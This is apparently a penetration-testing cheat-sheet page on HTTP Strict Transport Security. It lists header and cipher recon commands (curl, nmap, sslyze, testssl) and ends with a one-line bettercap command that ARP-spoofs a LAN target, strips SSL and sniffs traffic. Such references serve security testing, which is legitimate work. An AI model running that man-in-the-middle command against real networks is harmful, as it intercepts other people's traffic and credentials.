HTTP Strict Transport Security
Check List
Cheat Sheet
Recon Header
curl -s -D- $WEBSITE | grep -i strict
nmap -sS -sV --mtu 5000 --script ssl-enum-ciphers $WEBSITE
Scan Vulnerabilities
sslyze $WEBSITE
testssl $WEBSITE
MitM
Interface Network
INTERFACE=$(ip -o -4 addr show | awk '{print $2}' | grep -v "lo" | head -n 1)
MitM on LAN
bettercap -iface $INTERFACE -eval "set arp.spoof.targets $TARGET; arp.spoof on; http.proxy on; http.proxy.sslstrip true; net.sniff on"
Last updated
Was this helpful?